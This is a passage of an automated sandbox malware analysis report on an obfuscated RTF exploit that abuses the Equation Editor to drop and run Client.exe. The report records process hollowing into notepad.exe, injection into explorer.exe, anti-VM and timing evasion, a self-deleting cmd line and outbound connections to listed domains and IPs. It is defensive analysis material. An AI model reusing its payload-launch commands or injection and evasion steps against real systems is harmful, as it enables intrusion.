Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FEA0 NtReadVirtualMemory,LdrInitializeThunk, 9_2_00A9FEA0
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_00A9FED0
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FFB4 NtCreateSection,LdrInitializeThunk, 9_2_00A9FFB4
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00AA10D0 NtOpenProcessToken, 9_2_00AA10D0
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00AA0060 NtQuerySection, 9_2_00AA0060
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00AA01D4 NtSetValueKey, 9_2_00AA01D4
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00AA010C NtOpenDirectoryObject, 9_2_00AA010C
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00AA1148 NtOpenThread, 9_2_00AA1148
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00AA07AC NtCreateMutant, 9_2_00AA07AC
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9F8CC NtWaitForSingleObject, 9_2_00A9F8CC
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9F938 NtWriteFile, 9_2_00A9F938
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00AA1930 NtSetContextThread, 9_2_00AA1930
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FAB8 NtQueryValueKey, 9_2_00A9FAB8
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FA20 NtQueryInformationFile, 9_2_00A9FA20
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FA50 NtEnumerateValueKey, 9_2_00A9FA50
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FBE8 NtQueryVirtualMemory, 9_2_00A9FBE8
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FB50 NtCreateKey, 9_2_00A9FB50
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FC30 NtOpenProcess, 9_2_00A9FC30
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FC48 NtSetInformationFile, 9_2_00A9FC48
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00AA0C40 NtGetContextThread, 9_2_00AA0C40
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00AA1D80 NtSuspendThread, 9_2_00AA1D80
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FD5C NtEnumerateKey, 9_2_00A9FD5C
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FE24 NtWriteVirtualMemory, 9_2_00A9FE24
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FFFC NtCreateProcessEx, 9_2_00A9FFFC
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FF34 NtQueueApcThread, 9_2_00A9FF34
Source: Client.exe.0.dr Static PE information: Section: 5++.8$ ZLIB complexity 1.0003371646578538
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winRTF@11/9@2/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: .VBPud<_
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf Virustotal: Detection: 43%
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf ReversingLabs: Detection: 21%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ................................C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.n.o.t.e.p.a.d...e.x.e...........................B.........0.......0..... Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ......................0.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P1P.......4.t...........0.......................&.................0..... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\notepad.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247} Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\notepad.exe" Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR5B39.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf Static file information: File size 2870044 > 1048576
Source: Binary string: ipconfig.pdb source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ipconfig.pdbN source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: notepad.pdb source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: notepad.exe, notepad.exe, 00000009.00000003.950924763.0000000000900000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1046378480.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.949038674.00000000002A0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1176285668.0000000002220000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000003.1044991591.0000000002090000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: notepad.pdbx source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp
Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.dr Initial sample: OLE indicators vbamacros = False
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_00A286CE push es; ret 6_2_00A286E3
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_00A24403 push esi; ret 6_2_00A24432
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_003290F2 pushfd ; ret 6_2_00329171
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_003290DA push esp; ret 6_2_003290F1
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_00328F38 push eax; retn 002Dh 6_2_00328F39
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_003606AF push 036C4A39h; ret 6_2_003606B9
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_004AA4B6 push esi; iretd 6_2_004AA4B7
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_004AA8B5 push edi; retf 6_2_004AA8B6
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_004D7CC7 push ecx; ret 6_2_004D7CCC
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_004D7112 push es; iretd 6_2_004D7117
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_00873EBF push ebx; retf 6_2_00873EC0
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_00873ABB push edi; iretd 6_2_00873ABC
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_008746BB push edx; ret 6_2_008746C1
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_0087051F push es; iretd 6_2_00870533
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_02407248 push 00000003h; ret 6_2_0240725D
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_02401E4D push 00000003h; ret 6_2_02401E57
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_02404E5A push 00000003h; ret 6_2_02404E71
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_02403E63 push 00000003h; ret 6_2_02403E79
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_02402671 push 00000003h; ret 6_2_0240267B
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_02402E71 push 00000003h; ret 6_2_02402E74
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_02406671 push 00000003h; ret 6_2_0240668E
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_02404672 push 00000003h; ret 6_2_0240467C
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_0240261D push 00000003h; ret 6_2_02402627
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_02406220 push 00000003h; ret 6_2_0240623C
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_02400A22 push 00000003h; ret 6_2_02400A25
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_02403E22 push 00000003h; ret 6_2_02403E25
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_02406A32 push 00000003h; ret 6_2_02406A36
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_02403633 push 00000003h; ret 6_2_02403636
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_02405E3B push 00000003h; ret 6_2_02405E3E
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_024032E4 push 00000003h; ret 6_2_024032E7
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_02405AEF push 00000003h; ret 6_2_02405B20
Source: Client.exe.0.dr Static PE information: section name: 5++.8$
Source: Client.exe.0.dr Static PE information: section name:
Source: initial sample Static PE information: section name: 5++.8$ entropy: 7.999437666681734

Persistence and Installation Behavior

Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\Client.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE6
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\notepad.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\notepad.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 0000000000089904 second address: 000000000008990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 0000000000089B7E second address: 0000000000089B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 772 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 2524 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Client.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00409AB0 rdtsc 9_2_00409AB0
Source: explorer.exe, 0000000A.00000000.1032772942.00000000043F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 0000000A.00000000.996254060.0000000008636000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 0000000A.00000000.996254060.0000000008636000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000d-dv
Source: explorer.exe, 0000000A.00000000.1006904830.000000000434F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: explorer.exe, 0000000A.00000000.1027538105.000000000037B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
Source: explorer.exe, 0000000A.00000000.1007549733.0000000004423000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.1032772942.00000000043F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
Source: explorer.exe, 0000000A.00000000.1006904830.000000000434F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
Source: explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00AB26F8 mov eax, dword ptr fs:[00000030h] 9_2_00AB26F8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process queried: DebugPort Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_004D33F8 LdrLoadDll, 6_2_004D33F8
Source: C:\Users\user\AppData\Local\Temp\Client.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Domain query: www.best-boy.net
Source: C:\Windows\explorer.exe Network Connect: 104.167.67.175 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 66.235.200.170 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.thegoldencamel.online
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Memory written: C:\Windows\SysWOW64\notepad.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Thread created: C:\Windows\SysWOW64\notepad.exe EIP: 75554977 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section unmapped: C:\Windows\SysWOW64\notepad.exe base address: 400000 Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 370000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Memory written: C:\Windows\SysWOW64\notepad.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Memory written: C:\Windows\SysWOW64\notepad.exe base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Memory written: C:\Windows\SysWOW64\notepad.exe base: 7EFDE008 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Memory written: C:\Windows\SysWOW64\notepad.exe base: 80000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Memory written: C:\Windows\SysWOW64\notepad.exe base: 77A7975D Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Thread register set: target process: 1860 Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Thread register set: target process: 1860 Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247} Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\notepad.exe" Jump to behavior
Source: explorer.exe, 0000000A.00000000.956257017.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1002025010.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027938385.0000000000830000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.956257017.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1002025010.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.956257017.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1002025010.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027938385.0000000000830000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager<
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Client.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Client.exe VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information


Remote Access Functionality
